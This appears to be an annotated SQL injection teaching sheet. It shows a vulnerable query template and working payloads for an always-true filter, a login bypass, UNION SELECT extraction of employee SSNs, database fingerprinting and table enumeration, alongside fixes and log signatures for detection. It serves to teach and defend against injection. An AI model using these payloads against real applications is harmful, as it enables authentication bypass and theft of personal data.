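-- Vulnerable pattern: $lname is interpolated straight into the SQL text, so the input can change the statement's structure.
-- Fix: use a prepared statement and pass the search term as a bound parameter (the LIKE wildcards are added to the bound value, not to the SQL string).
$query = "SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%$lname%'";

-- Intended use ($lname = Smith)
SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%Smith%'

-- Goal of the injection: an always-true condition, so every row is returned
SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%%' OR 1=1

-- What the input actually yields: the %' left over from the template makes the statement invalid
SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%' OR 1=1%'

-- With a trailing comment marker the leftover %' is ignored and the statement parses
SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%' OR 1=1 -- %'

-- Authentication depends on any result
-- (%uname and %pwd mark where the submitted user name and password are inserted)
SELECT UNAME, PASSWD FROM USERS WHERE UNAME = '%uname' AND PASSWD = '%pwd'
SELECT UNAME, PASSWD FROM USERS WHERE UNAME = '' AND PASSWD = '' OR 1=1 -- '
-- The login check passes because it only tests whether a row came back.
-- Defence: bind both values as parameters, look up the one named user, and verify a salted password hash in application code.
-- The query as written also suggests PASSWD is compared as stored text; confirm how passwords are stored.

-- Get SSNs
-- (the UNION must return the same number of columns as the original query, here two; AND 1=0 removes the original rows from the result)
' UNION SELECT LNAME, SSN FROM EMPLOYEE --
' AND 1=0 UNION SELECT LNAME, SSN FROM EMPLOYEE --

-- Fit 3 fields into 2 columns
' AND 1=0 UNION SELECT concat(FNAME, ' ', LNAME), SSN FROM EMPLOYEE --

-- Call functions in MySQL
' AND 1=0 UNION SELECT user(), null FROM EMPLOYEE --

-- Fingerprint DB and OS
' AND 1=0 UNION SELECT version(), database() FROM EMPLOYEE --

-- Get table names
' AND 1=0 UNION SELECT table_name, null from information_schema.tables --

-- Every example above depends on the same root cause: user input concatenated into the query string.
-- Bound parameters remove it; a least-privileged database account (no read access to SSN or to tables the page does not need) limits what a missed case can expose.
-- In request and query logs these inputs appear as parameter values containing a quote followed by OR 1=1, UNION SELECT, information_schema, or a trailing --.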